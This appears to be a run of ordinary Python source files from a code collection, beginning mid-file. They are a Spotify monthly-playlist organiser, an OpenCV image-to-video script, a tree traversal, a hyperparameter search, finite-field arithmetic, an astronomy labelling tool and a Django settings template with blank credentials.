'unbecoming',\r\n 'glossy', 'quack', 'nutritious', 'aback', 'female', 'dispensable', 'disgusting', 'illustrious', 'half',\r\n 'ignorant', 'first', 'rude', 'eight', 'educated', 'malicious', 'incredible', 'living', 'hilarious',\r\n 'funny', 'loud', 'sneaky', 'discreet', 'eager', 'normal', 'childlike', 'spiky', 'condemned', 'exclusive',\r\n 'resonant', 'great', 'happy', 'yummy', 'ancient', 'private', 'ruthless', 'lamentable', 'weak', 'ashamed',\r\n 'imperfect', 'divergent', 'symptomatic', 'flowery', 'pretty', 'sloppy', 'gleaming', 'jaded', 'knotty',\r\n 'messy', 'hellish', 'lovely', 'handsomely', 'unnatural', 'amuck', 'taboo', 'alert', 'optimal',\r\n 'questionable', 'fantastic', 'witty', 'judicious', 'elderly', 'few', 'halting', 'ajar', 'drunk',\r\n 'yielding', 'groovy', 'wary', 'unhealthy', 'squeamish', 'long-term', 'damp', 'special', 'disgusted',\r\n 'complex', 'right', 'early', 'slow', 'hollow', 'faded', 'whispering', 'even', 'bright', 'past', 'alleged',\r\n 'obsequious', 'habitual', 'billowy', 'glistening', 'victorious', 'stingy', 'delirious', 'gifted',\r\n 'jittery', 'rabid', 'steadfast', 'outstanding', 'defiant', 'unbiased', 'spicy', 'minor', 'laughable',\r\n 'electric', 'feeble', 'open', 'physical', 'disastrous', 'humdrum', 'scattered', 'quizzical', 'poor',\r\n 'secret', 'materialistic', 'alike', 'harsh', 'sable', 'skillful', 'slim', 'separate', 'kind', 'pointless',\r\n 'alive', 'zonked', 'beautiful', 'detailed', 'demonic', 'furtive', 'greasy', 'fertile', 'dramatic',\r\n 'trashy', 'violet', 'obedient', 'moaning', 'huge', 'numberless', 'uneven', 'callous', 'horrible',\r\n 'scintillating', 'puzzling', 'jumpy', 'lethal', 'serious', 'well-to-do', 'deeply', 'last', 'hysterical',\r\n 'present', 'tearful', 'acceptable', 'festive', 'sophisticated', 'lacking', 'two', 'shaky', 'nauseating',\r\n 'ossified', 'tacit', 'adamant', 'somber', 'phobic', 'damaged', 'impartial', 'striped', 'earthy',\r\n 'befitting', 'flagrant', 'motionless', 'same', 'blue-eyed', 'earsplitting', 'penitent', 'hapless',\r\n 'spiritual', 'internal', 'psychedelic', 'poised', 'naughty', 'quiet', 'faithful', 'womanly', 'nondescript',\r\n 'annoying', 'curious', 'cooperative', 'abject', 'shaggy', 'crazy', 'panicky', 'uttermost', 'exuberant',\r\n 'chivalrous', 
'meaty', 'worthless', 'young', 'juicy', 'boundless', 'garrulous', 'makeshift', 'puny',\r\n 'likeable', 'wild', 'wonderful', 'cuddly', 'reflective', 'high', 'zesty', 'pale', 'awesome', 'chemical',\r\n 'verdant', 'certain', 'icky', 'glorious', 'changeable', 'peaceful', 'rambunctious', 'charming', 'tart',\r\n 'therapeutic', 'legal', 'ordinary', 'superb', 'jagged', 'unique', 'brainy', 'smooth', 'quick', 'far-flung',\r\n 'organic', 'hateful', 'defective', 'domineering', 'knowing', 'momentous', 'wakeful', 'caring', 'absurd',\r\n 'ambiguous', 'three', 'literate', 'stiff', 'foregoing', 'kindhearted', 'public', 'deranged', 'draconian',\r\n 'salty', 'oafish', 'nonchalant', 'immense', 'quaint', 'frightening', 'forgetful', 'apathetic',\r\n 'delightful', 'wanting', 'icy', 'sulky', 'mundane', 'encouraging', 'obeisant', 'neighborly', 'lying',\r\n 'better', 'decorous', 'flimsy', 'incandescent', 'auspicious', 'deserted', 'uncovered', 'well-off',\r\n 'hanging', 'nasty', 'one', 'spotty', 'melted', 'fresh', 'adventurous', 'perfect', 'aware', 'needy',\r\n 'nifty', 'honorable', 'tall', 'attractive', 'overjoyed', 'energetic', 'shrill', 'nappy', 'miscreant',\r\n 'rhetorical', 'rich', 'fearful', 'paltry', 'ritzy', 'efficacious', 'tested', 'productive', 'overconfident',\r\n 'meek', 'fluttering', 'null', 'prickly', 'elegant', 'handsome', 'milky', 'real', 'imminent', 'fearless',\r\n 'oval', 'painful', 'bashful', 'puffy', 'undesirable', 'helpful', 'lush', 'typical', 'lively', 'nutty',\r\n 'mere', 'disturbed', 'scandalous', 'late', 'foolish', 'bitter', 'agreeable', 'nosy', 'interesting',\r\n 'curvy', 'selfish', 'colorful', 'possible', 'ready', 'responsible', 'frantic', 'aggressive', 'temporary',\r\n 'cold', 'adhesive', 'homely', 'fortunate', 'rapid', 'learned', 'gusty', 'unknown', 'thoughtful', 'elfin',\r\n 'reminiscent', 'outgoing', 'aboriginal', 'ahead', 'marked', 'seemly', 'plastic', 'idiotic', 'hulking',\r\n 'dapper', 'old', 'grey', 'zealous', 'ubiquitous', 'tremendous', 'lumpy', 'knowledgeable', 'mature',\r\n 'obsolete', 'steep', 'faulty', 'bumpy', 'stimulating', 'threatening', 'hideous', 'goofy', 'bad', 'mute',\r\n 'annoyed', 'delicate', 'untidy', 'permissible', 'intelligent', 'abrupt', 'overt', 'hungry', 'rough',\r\n 'bloody', 'tan', 'lean', 'decisive', 'tawdry', 'flawless', 'holistic', 'bizarre', 'tiny', 'imaginary',\r\n 'magical', 'heady', 'quixotic', 'empty', 'thankful', 'languid', 'terrible', 'cowardly', 'irritating',\r\n 'didactic', 'dusty', 'majestic', 'courageous', 'numerous', 'fuzzy', 'hospitable', 'false', 'coordinated',\r\n 'racial', 'abaft', 'quickest', 'inquisitive', 'clever', 'bright', 'clumsy', 'infamous', 'petite', 'like',\r\n 'jolly', 'large', 'mellow', 'tender', 'troubled', 'important', 'abiding', 'scrawny', 'wistful', 'careless',\r\n 'wiggly', 'utopian', 'assorted', 'rightful', 'receptive', 'capricious', 'thinkable', 'loving', 'able',\r\n 'dysfunctional', 'free', 'bent', 'elite', 'protective', 'efficient', 'lonely', 'impolite', 'overwrought',\r\n 'envious', 'homeless', 'nonstop', 'plant', 'precious', 'abstracted', 'ad', 'hoc', 'accidental', 'dark',\r\n 'yellow', 'nostalgic', 'glamorous', 'romantic', 'loutish', 'freezing', 'unable', 'drab', 'tame', 'ultra',\r\n 'impossible', 'deafening', 'straight', 'secretive', 'clear', 'satisfying', 'ill', 'familiar', 'terrific',\r\n 'dead', 'overrated', 'sweet', 'valuable', 'tough', 'aberrant', 'needless', 'voiceless', 'tangible',\r\n 'vivacious', 'absorbing', 'axiomatic', 'lackadaisical', 'painstaking', 'hot', 'squealing', 'gainful',\r\n 'pink', 'imported', 
'truculent', 'placid', 'giant', 'profuse', 'exultant', 'stale', 'male', 'brave',\r\n 'animated', 'second', 'squalid', 'curly', 'kindly', 'dear', 'fat', 'thundering', 'frequent', 'shy',\r\n 'screeching', 'gullible', 'polite', 'abandoned', 'measly', 'flippant', 'quirky', 'panoramic', 'debonair',\r\n 'incompetent', 'dizzy', 'futuristic', 'busy', 'inconclusive', 'chunky', 'fancy', 'abounding', 'uppity',\r\n 'juvenile', 'acid', 'parched', 'mindless', 'savory', 'lazy', 'unkempt', 'sore', 'far', 'eminent', 'purple',\r\n 'orange', 'keen', 'complete', 'lopsided', 'parallel', 'robust', 'swift', 'murky', 'pricey', 'unarmed',\r\n 'calculating', 'expensive',\r\n 'Jacketed', 'Jacobean', 'Jaded', 'Jaggy', 'Jamaican', 'Jammed', 'Jangling', 'Jarred', 'Jaunty',\r\n 'Jawed', 'Jealous', 'Jeering', 'Jerky', 'Jestful', 'Jiggish', 'Jocular', 'Jointed', 'Jolly',\r\n 'Journalistic', 'Jovial', 'Joyful', 'Joyless', 'Jubilant', 'Judaic', 'Judge', 'Judgmental', 'Judicial',\r\n 'Jugular', 'Juiceless', 'Junior', 'Jurassic', 'Jurist', 'Just', 'Justifiable', 'Jutting', 'Juvenile']\r\nword_list = [word.lower() for word in word_list]\r\n\r\nREQUEST_SIZE = 50\r\nONLY_PROCESS_CURRENT_MONTH = True\r\nscope = \"user-library-read,playlist-modify-public,playlist-modify-private,playlist-read-private,playlist-read-collaborative,ugc-image-upload\"\r\n\r\ntry:\r\n spotify = spotipy.Spotify(\r\n auth_manager=SpotifyOAuth(scope=scope, cache_path=r'/data/token.txt', client_id=os.getenv('SPOTIFY_CLIENT_ID'),\r\n client_secret=os.getenv('SPOTIFY_CLIENT_SECRET'),\r\n redirect_uri=os.getenv('SPOTIFY_REDIRECT_URI')))\r\nexcept:\r\n spotify = spotipy.Spotify(\r\n auth_manager=SpotifyOAuth(scope=scope, cache_path=r'data/token.txt', client_id=os.getenv('SPOTIFY_CLIENT_ID'),\r\n client_secret=os.getenv('SPOTIFY_CLIENT_SECRET'),\r\n redirect_uri=os.getenv('SPOTIFY_REDIRECT_URI')))\r\n\r\nuser_id = spotify.current_user()['id']\r\nprint(\"Logged in as \" + spotify.me()['display_name'])\r\n\r\n\r\ndef get_saved_tracks(full_query=False):\r\n print('Getting {} saved tracks'.format('all' if full_query else 'first {} tracks'.format(REQUEST_SIZE)))\r\n results = spotify.current_user_saved_tracks(limit=REQUEST_SIZE)\r\n tracks = results['items']\r\n if full_query:\r\n while results['next']:\r\n results = spotify.next(results)\r\n tracks.extend(results['items'])\r\n\r\n df = pd.DataFrame(tracks)\r\n # group df by added_at by month\r\n df['added_at'] = pd.to_datetime(df['added_at'])\r\n df['added_at'] = df['added_at'].apply(lambda x: x.replace(tzinfo=None))\r\n df['year_month'] = df['added_at'].dt.to_period('M')\r\n df['year_month'] = df['year_month'].astype(str)\r\n print(df)\r\n return df\r\n\r\n\r\ndef get_as_base64(url):\r\n return base64.b64encode(requests.get(url).content)\r\n\r\n\r\ndef get_all_playlists():\r\n results = spotify.current_user_playlists(limit=REQUEST_SIZE)\r\n playlists = results['items']\r\n while results['next']:\r\n results = spotify.next(results)\r\n playlists.extend(results['items'])\r\n return playlists\r\n\r\n\r\ndef get_playlist_tracks(playlist_id):\r\n results = spotify.playlist_items(playlist_id, limit=REQUEST_SIZE)\r\n tracks = results['items']\r\n while results['next']:\r\n results = spotify.next(results)\r\n tracks.extend(results['items'])\r\n return tracks\r\n\r\n\r\nplaylists = get_all_playlists()\r\n# remove duplicate fun words from the word list\r\nfor playlist in playlists:\r\n if re.match(r'.+📆\\d{4}-\\d{2}', playlist['description']):\r\n # get the fun word with \\s([A-Za-z-]+)\\s\r\n fun_word = 
re.search(r'\\s([A-Za-z-]+)\\s', playlist['name']).group(1)\r\n if fun_word in word_list:\r\n word_list.remove(fun_word)\r\nplaylist_names = [playlist['name'] for playlist in playlists]\r\nplaylist_descriptions = [playlist['description'] for playlist in playlists]\r\n\r\n\r\ndef get_description_key(year_month):\r\n return f\"📆{year_month}\"\r\n\r\n\r\ndef make_description(year_month):\r\n return f\"🤖 generated playlist for {get_description_key(year_month)}\"\r\n\r\n\r\n# delete YYYY-MM playlists\r\ndef delete_playlists():\r\n for playlist in playlists:\r\n if re.match(r'.+📆\\d{4}-\\d{2}', playlist['description']):\r\n print(f\"Deleting playlist {playlist['name']}\")\r\n spotify.current_user_unfollow_playlist(playlist_id=playlist['id'])\r\n\r\n\r\ndef make_creative_name(month, year):\r\n # print(f\"Making creative name for {month} {year}\")\r\n # find a random word from the list whose first letter is the same as the first letter of the month\r\n filtered_word_list = [word for word in word_list if word[0] == month.lower()[0]]\r\n # print(f\"Filtered word list: {filtered_word_list}\")\r\n random_word = random.choice(filtered_word_list)\r\n # remove the word from the list, so it can't be used again\r\n word_list.remove(random_word)\r\n return f'{year[2:4]} {random_word.capitalize()} {month}'\r\n # return f'{word} {month}'\r\n\r\n\r\n# Gets the ID of an existing playlist based on name, or creates a new playlist if it doesn't exist\r\ndef get_playlist_id_by_key(year_month=''):\r\n month = datetime.datetime.strptime(year_month, '%Y-%m').strftime('%B')\r\n description = make_description(year_month)\r\n description_key = get_description_key(year_month)\r\n\r\n for playlist in playlists:\r\n if description_key in playlist['description']:\r\n # print(f\"Found existing playlist {playlist['name']}\")\r\n return playlist['id']\r\n\r\n name = make_creative_name(month, year_month)\r\n playlist = spotify.user_playlist_create(user=user_id, name=name, public=True, collaborative=False,\r\n description=description)\r\n print(f'Created playlist {name}')\r\n return playlist['id']\r\n # else:\r\n # print(f\"Playlist for {year_month} already exists\")\r\n # return [playlist['id'] for playlist in playlists if playlist['description'] == description][0]\r\n\r\n\r\n# days of week: 0 = Monday, 6 = Sunday\r\n# backup_playlist(\"Discover Weekly\", \"DW \", \"🤖 generated backup playlist for Discover Weekly\", 4, False)\r\ndef backup_playlist(original_name, backup_name, backup_description, day_of_week, use_cover_image):\r\n print(f\"Backing up playlist {original_name} to {backup_name}\")\r\n # check day of week\r\n if pd.Timestamp.today().dayofweek != day_of_week:\r\n print(f\" Today is not day {day_of_week}, skipping backup\")\r\n return\r\n # get the playlist ID of the original playlist, this is an array but should only have zero or one item\r\n playlist_id = [playlist['id'] for playlist in playlists if playlist['name'] == original_name]\r\n if not len(playlist_id):\r\n return\r\n\r\n playlist_id = playlist_id[0]\r\n # check if the backup playlist already exists, this is an array but should only have zero or one item\r\n if len([playlist['id'] for playlist in playlists if playlist['name'] == backup_name]):\r\n print(f\" Backup playlist {backup_name} already exists\")\r\n return\r\n new_playlist = spotify.user_playlist_create(user=user_id, name=backup_name, public=False, collaborative=False,\r\n description=backup_description)\r\n\r\n backup_id = new_playlist['id']\r\n\r\n if use_cover_image:\r\n image = 
spotify.playlist_cover_image(playlist_id)[0]['url']\r\n spotify.playlist_upload_cover_image(backup_id, get_as_base64(image))\r\n\r\n print(f\" Created backup playlist {backup_name}\")\r\n # get the tracks from the original playlist\r\n tracks = get_playlist_tracks(playlist_id)\r\n # add the tracks to the backup playlist\r\n spotify.playlist_add_items(backup_id, [track['track']['id'] for track in tracks])\r\n\r\n print(f\" Added {len(tracks)} tracks to backup playlist {backup_name}\")\r\n\r\n\r\ndef main():\r\n # delete_playlists()\r\n # playlists = get_all_playlists()\r\n # playlist_names = [playlist['name'] for playlist in playlists]\r\n # playlist_descriptions = [playlist['description'] for playlist in playlists]\r\n # return\r\n\r\n today = pd.Timestamp.today()\r\n monday = today - pd.Timedelta(days=today.dayofweek)\r\n dw_name = f'DW {str(monday)[:10]}'\r\n dw_description = '🤖 generated backup playlist for Discover Weekly'\r\n backup_playlist(\"Discover Weekly\", dw_name, dw_description, 2, False)\r\n\r\n rr_name = f'RR {str(monday)[:10]}'\r\n rr_description = '🤖 generated backup playlist for Release Radar'\r\n backup_playlist(\"Release Radar\", rr_name, rr_description, 2, True)\r\n\r\n # only do a full query if it's in the first 9 minutes of the hour\r\n # if it runs every 5 minutes, this will only run once per hour\r\n full_query = False\r\n if today.minute < 9:\r\n full_query = True\r\n\r\n tracks_df = get_saved_tracks(full_query)\r\n if ONLY_PROCESS_CURRENT_MONTH:\r\n tracks_df = tracks_df[tracks_df['added_at'] >= datetime.datetime.today().replace(day=1)]\r\n print(f\"Found {len(tracks_df)} tracks\")\r\n\r\n df_grouped = tracks_df.groupby('year_month')\r\n\r\n # name is YYYY-MM\r\n total_added = 0\r\n for name, group in df_grouped:\r\n group_len = group.shape[0]\r\n if group_len > 1:\r\n # make a new playlist if one with name doesn't exist\r\n playlist_id = get_playlist_id_by_key(year_month=name)\r\n\r\n # get the track ids in the playlist\r\n playlist_tracks = get_playlist_tracks(playlist_id)\r\n playlist_track_ids = [track['track']['id'] for track in playlist_tracks]\r\n\r\n # make a list of track ids\r\n track_ids = [x['id'] for x in group['track'].tolist()]\r\n # filter out the tracks that are already in the playlist\r\n track_ids = [track_id for track_id in track_ids if track_id not in playlist_track_ids]\r\n # remove duplicates\r\n track_ids = list(set(track_ids))\r\n\r\n if track_ids:\r\n spotify.playlist_add_items(playlist_id=playlist_id, items=track_ids)\r\n print(f\"Added {len(track_ids)} tracks to {name}\")\r\n total_added += len(track_ids)\r\n\r\n print(f\"Added {total_added} tracks to playlists\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bscholer/spotify-tools","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5046863312","text":"#!/usr/bin/env python\n\"\"\"\n\tScript that attempts creating a video from a series of pictures\n\"\"\"\n\nimport numpy as np\nimport cv2 as cv\nimport random\nimport sys\nimport os\n\nif not os.path.exists('video'):\n\tos.mkdir('video')\n\nfourcc = cv.VideoWriter_fourcc(*'XVID')\nout = cv.VideoWriter('video/new.avi', fourcc, 1, (640, 480), isColor=True)\n\nwhile True:\n\turl = ['images/0.jpeg', 'images/1.jpeg', 'images/2.jpeg']\n\tfile = cv.samples.findFile(url[random.randint(0, 2)])\n\timg = cv.imread(file)\n\n\tframe = cv.flip(img, 
0)\n\t# the VideoWriter was opened for 640x480 frames; frames of any other size are silently dropped, so resize first\n\tframe = cv.resize(frame, (640, 480))\n\n\tout.write(frame)\n\n\tcv.imshow(\"Video\", frame)\n\tif cv.waitKey(1) == ord(\"q\"):\n\t\tbreak\n\nout.release()\ncv.destroyAllWindows()\n","repo_name":"Ddilibe/Python-Miniprojects","sub_path":"Libraries/Opencv/createvideo.py","file_name":"createvideo.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"26922707110","text":"from queue import Queue\n\nclass Node: \n    def __init__(self, nodeVal = None, right=None, left=None):\n        self.nodeVal = nodeVal\n        self.right = right\n        self.left = left\n\n\n############################################################################################\n\nclass BinaryTree:\n    def __init__(self, value=None):\n        self.root = Node(value)\n    \n    def breadth_first(self): \n        if self.root is None: \n            return \"Please enter a valid tree\"\n\n        return_list = [] \n\n        # queue.Queue exposes put/get/empty, not enqueue/dequeue/is_empty\n        new_queue = Queue() \n        new_queue.put(self.root) \n\n        while not new_queue.empty():\n            current = new_queue.get()\n\n            if current is None:\n                break\n\n            return_list.append(current.nodeVal)\n\n            if current.left is not None:\n                new_queue.put(current.left)\n\n            if current.right is not None:\n                new_queue.put(current.right)\n        return return_list\n\n\n\n\n# new_tree = BinaryTree()\n# new_tree.root = Node(\"A\")\n# new_tree.root.left = Node(\"B\")\n# new_tree.root.right = Node(\"C\")\n# new_tree.root.right.left = Node(\"F\") \n# new_tree.root.left.left = Node(\"D\") \n# new_tree.root.left.right = Node(\"E\") \n\n# print(new_tree.breadth_first())\n\n    #  a\n    # b c\n# d  e f\n\n# expected a b c d e f","repo_name":"SianCulligan/python-data-structures-and-algorithms","sub_path":"python/code_challenges/breadth-first/breadth_first/breadth_first.py","file_name":"breadth_first.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"21209125751","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn import ensemble\nfrom sklearn import metrics\nfrom sklearn import model_selection\n\nif __name__ == '__main__':\n    \n    df = pd.read_csv('../data/mobile-pricing/train.csv')\n    X = df.drop('price_range', axis=1).values\n    y = df['price_range'].values\n    \n    classifier = ensemble.RandomForestClassifier(n_jobs=-1)\n    \n    params = {\n        'n_estimators': np.arange(100,1500,100),\n        'max_depth': np.arange(1,31),\n        'criterion': ['gini', 'entropy']\n    }\n    \n    model = model_selection.RandomizedSearchCV(estimator=classifier,\n                                               param_distributions=params,\n                                               scoring='accuracy',\n                                               verbose=1,\n                                               n_jobs=-1,\n                                               cv=5)\n    model.fit(X, y)\n    print('Best score: {}'.format(model.best_score_))\n    print('Best parameters set:')\n    best_params = model.best_estimator_.get_params()\n    for param in sorted(params.keys()):\n        print(f'\\t{param}: {best_params[param]}')\n    ","repo_name":"rootchile/ml-personal","sub_path":"src/tuning_random_search_rf.py","file_name":"tuning_random_search_rf.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"74072763306","text":"from poly import *\n\ndef prime_divisors(a):\n    output = []\n\n    # integer division keeps a an exact int (float division would lose precision for large a)\n    while a % 2 == 0:\n        a = a//2\n        if 2 not in output:\n            output.append(2)\n\n    i = 3\n    while a != 1:\n        while a % i == 0:\n            a = a//i\n            if i not in output:\n                output.append(i)\n        i += 2\n\n    return output\n\ndef exp_field(mod, mod_poly, a, b):\n    z, s, p = [1], a, b\n\n    while p > 0:\n        if p % 2 == 1:\n            z = multiply_poly(mod, z, s)\n        p = p//2\n        if p > 0:\n            s = 
multiply_poly(mod, s, s)\n\n    z = long_div_poly(mod, z, mod_poly)[1]\n\n    return z\n\n# Produces the addition table of field F\ndef add_table(mod, mod_poly):\n    deg = deg_poly(mod, mod_poly)\n    table = [[]]\n\n    for p in generate_polys(mod, deg - 1):\n        table[0].append(p)\n\n    for i in range(1, len(table[0])):\n        table.append([])\n        for p in table[0]:\n            table[i].append(add_poly(mod, table[0][i], p))\n\n    table = [[display_field(mod, mod_poly, p) for p in row] for row in table]\n    rows = [', '.join(row) for row in table]\n    return '{' + '; '.join(rows) + '}'\n\n# Produces the multiplication table of F\ndef mult_table(mod, mod_poly):\n    deg = deg_poly(mod, mod_poly)\n    table = [[]]\n\n    for p in generate_polys(mod, deg - 1):\n        table[0].append(p)\n\n    for i in range(1, len(table[0])):\n        table.append([])\n        for p in table[0]:\n            table[i].append(multiply_poly(mod, table[0][i], p))\n\n    table[0] = [[0] for _ in table[0]]\n\n    table = [[display_field(mod, mod_poly, p) for p in row] for row in table]\n    rows = [', '.join(row) for row in table]\n    return '{' + '; '.join(rows) + '}'\n\n# Give a representative of the following field element of F in standard form\ndef display_field(mod, mod_poly, a):\n    while not deg_poly(mod, a) < deg_poly(mod, mod_poly):\n        while not a[0] % mod_poly[0] == 0:\n            a[0] += mod\n        sub = mod_poly + [0] * (deg_poly(mod, a) - deg_poly(mod, mod_poly))\n        sub = [x * a[0] // mod_poly[0] for x in sub]\n        a = subtract_poly(mod, a, sub)\n    a = [x % mod for x in a]\n    return display_poly(mod, a)\n\n# Apply addition to the following element in F\ndef add_field(mod, mod_poly, a, b):\n    addAB = add_poly(mod, a, b)\n    output = long_div_poly(mod, addAB, mod_poly)[1]\n\n    return output\n\n# Apply subtraction to the following elements in F\ndef subtract_field(mod, mod_poly, a, b):\n    subtractAB = subtract_poly(mod, a, b)\n    output = long_div_poly(mod, subtractAB, mod_poly)[1]\n\n    return output\n\n# Apply multiplication to the following elements in F\ndef multiply_field(mod, mod_poly, a, b):\n    multiplyAB = multiply_poly(mod, a, b)\n    output = long_div_poly(mod, multiplyAB, mod_poly)[1]\n\n    return output\n\n# Find a multiplicative inverse of the following element of F\ndef inverse_field(mod, mod_poly, a):\n    [x, y, gcd] = euclid_poly(mod, a, mod_poly)\n\n    if gcd == [1]:\n        return add_field(mod, mod_poly, x, mod_poly)\n    return \"ERROR\"\n\n# Apply division of the first field element by the second one\ndef division_field(mod, mod_poly, a, b):\n    inverseB = inverse_field(mod, mod_poly, b)\n    if inverseB == \"ERROR\":\n        return \"ERROR\"\n    output = multiply_field(mod, mod_poly, a, inverseB)\n    return output\n\n# Test whether the following elements of F are equal\ndef equals_field(mod, mod_poly, a, b):\n    # reduce both elements to their canonical remainders mod mod_poly and compare\n    poly1 = long_div_poly(mod, a, mod_poly)[1]\n    poly2 = long_div_poly(mod, b, mod_poly)[1]\n    return poly1 == poly2  # True or False\n\n# Test whether the following field element is primitive\ndef primitive(mod, mod_poly, a):\n    # the field has mod**deg(mod_poly) elements, so its multiplicative group has order q - 1\n    deg = deg_poly(mod, mod_poly)\n    q = mod**deg\n\n    primDivs = prime_divisors(q-1)\n    #print(primDivs)\n\n    k = len(primDivs)\n\n    i = 0\n    while i < k and exp_field(mod, mod_poly, a, (q-1)//primDivs[i]) != [1]:\n        i += 1\n    return i >= k\n\n# Give a primitive element of F\ndef find_prim(mod, mod_poly):\n    if not irreducible(mod, mod_poly):\n        return \"ERROR\"\n\n    poly = random_poly(mod, deg_poly(mod, mod_poly)-1)\n\n    while not primitive(mod, mod_poly, poly):\n        poly = random_poly(mod, deg_poly(mod, mod_poly)-1)\n\n    output = poly\n    
return output\n\n# print(add_table(2, [1, 1, 1]))\n# print(mult_table(2, [1, 1, 1])) THIS IS NOT CORRECT\n# print(add_table(7, [1, 0]))\n# print(mult_table(7, [1, 0])) THIS IS NOT CORRECT\n\n# print(display_field(5, [1, 0, 2], [1, 1])) THIS IS NOT CORRECT YET\n# print(display_field(5, [1, 0, 2], [1, 0, 0])) THIS IS NOT CORRECT YET\n# print(display_field(7, [2, -2], [1, 1, 1])) THIS IS NOT CORRECT YET\n\n# print(add_field(2, [1, 1, 1], [1, 1], [1, 0]))\n# print(add_field(7, [2, -2], [1, 1, 1], [2]))\n\n# print(subtract_field(3, [1, 0, 2, 1], [1, 1, 2], [2, 0, 1]))\n\n# print(multiply_field(3, [1, 0, 2, 1], [1, 1], [1, 2]))\n# print(multiply_field(3, [1, 0, 2, 1], [1, 0, 0], [1, 0]))\n\n# print(inverse_field(2, [1, 1, 1], [1, 0]))\n# print(inverse_field(2, [1, 1, 0], [1, 0]))\n\n# print(division_field(2, [1, 1, 1], [1, 0], [1, 0]))\n# print(division_field(2, [1, 1, 1], [1], [1, 0]))\n# print(division_field(2, [1, 1, 1], [1], [0]))\n\n# print(equals_field(5, [1, 0, 2], [1, 0, 0], [3]))\n\n# print(primitive(7, [1, 0, 0, 2], [1, 0]))\n# print(primitive(7, [1, 0, 0, 2], [1, 0, 1]))\n\n# print(find_prim(7, [1, 0, 6]))\n# print(find_prim(7, [1, 0, 0, 2]))\n# print(find_prim(7, [1, 0, 1]))\n","repo_name":"ave-ottens/2WF90","sub_path":"Assignment 2/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18162402066","text":"#! /usr/bin/env python3\n\n\"\"\"Apply labels to brightest objects found\"\"\"\n\nimport argparse\nimport sys\nimport remdefaults\nimport find_results\n\nparsearg = argparse.ArgumentParser(description='Provide labels to brightest objects found', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparsearg.add_argument('file', nargs=1, type=str, help='Findres file')\nremdefaults.parseargs(parsearg, tempdir=False, inlib=False)\nparsearg.add_argument('--minmag', type=float, default=15.0, help='Minimum magnitude to find')\nparsearg.add_argument('--filter', type=str, help='Filter to limit to otherwise take brightest')\nparsearg.add_argument('--verbose', action='store_true', help='Tell everything')\n\nresargs = vars(parsearg.parse_args())\nfile = resargs['file'][0]\nminmag = resargs['minmag']\nfilt = resargs['filter']\nverbose = resargs['verbose']\n\nif filt is None:\n magset = set('griz')\nelse:\n magset = set(filt)\n\nmydb, dbcurs = remdefaults.opendb()\n\ntry:\n findres = find_results.load_results_from_file(file)\n targfr = findres.get_targobj()\nexcept find_results.FindResultErr as e:\n print(\"Cannot open\", file, \"error was\", e.args[0], file=sys.stderr)\n sys.exit(10)\n\nalready_got = findres.get_label_set(dbcurs)\nmag_to_fr = dict()\nfor fr in findres.results(idonly=True):\n if fr.obj.valid_label():\n continue\n mag = 1e9 # Should be a lesser value than that\n for m in magset:\n mf = getattr(fr.obj, m + 'mag', None)\n if mf is not None and mf < mag:\n mag = mf\n if mag < minmag:\n if mag in mag_to_fr:\n mag_to_fr[mag].append(fr)\n else:\n mag_to_fr[mag] = [fr]\n\nif len(mag_to_fr) == 0:\n print(\"No labels to assign in\", file, file=sys.stderr)\n sys.exit(11)\n\nfor mag in sorted(mag_to_fr.keys()):\n for fr in mag_to_fr[mag]:\n fr.assign_label(dbcurs, already_got) # NB updates already_got\n if verbose:\n print(\"Assigned label\", fr.label, \"to\", fr.obj.dispname, file=sys.stderr)\n\nfindres.reorder()\nfindres.relabel()\nfind_results.save_results_to_file(findres, file, 
force=True)\nmydb.commit()\n","repo_name":"JohnMCollins/python-astro-progs","sub_path":"Numpy/remfits2/label_brightest_finds.py","file_name":"label_brightest_finds.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"19992271970","text":"# Django settings for assassins_project project.\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n    # ('Your Name', 'your_email@example.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n        'NAME': '', # Or path to database file if using sqlite3.\n        'USER': '', # Not used with sqlite3.\n        'PASSWORD': '', # Not used with sqlite3.\n        'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n        'PORT': '', # Set to empty string for default. Not used with sqlite3.\n    }\n}\n\n\n#Assassins configurations\nADMIN_SUNETID = [''] #note that if you are an admin, some of the features won't work if you try to play (such as confirming death)\nTERMINATION_START = 48 # the number of hours that an assassin has to make their kill.\nDEFEND_TIME = 15 # the time in minutes that a target is safe after shooting their assassin.\nDORM_NAME = ''\n\n# Webauth configuration\nWEBAUTH_SHARED_SECRET = '' # just some random secret\nWEBAUTH_URL = '' # i.e. http://www.stanford.edu/~USERNAME/cgi-bin/wa-authenticate.php\nLOGIN_URL = '/webauth/login'\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\nBASE_URL = '' # i.e. http://www.google.com/\n\n# Email configuration\nEMAIL_HOST = ''\nEMAIL_PORT = ''\nEMAIL_HOST_USER = ''\nEMAIL_HOST_PASSWORD = ''\nEMAIL_USE_TLS = True\nDEFAULT_FROM_EMAIL = ''\n\nMEDIA_ROOT = '' # should be /path/to/project/media/\nMEDIA_URL = '/media/'\nSTATIC_ROOT = '' # should be /path/to/project/static/\nSTATIC_URL = '/static/'\n\n# Make sure you add the MEDIA_URL and STATIC_URL to your Apache2 site config\n# as an alias to the MEDIA_ROOT and STATIC_ROOT\n\n\n# Local time zone for this installation. Choices can be found 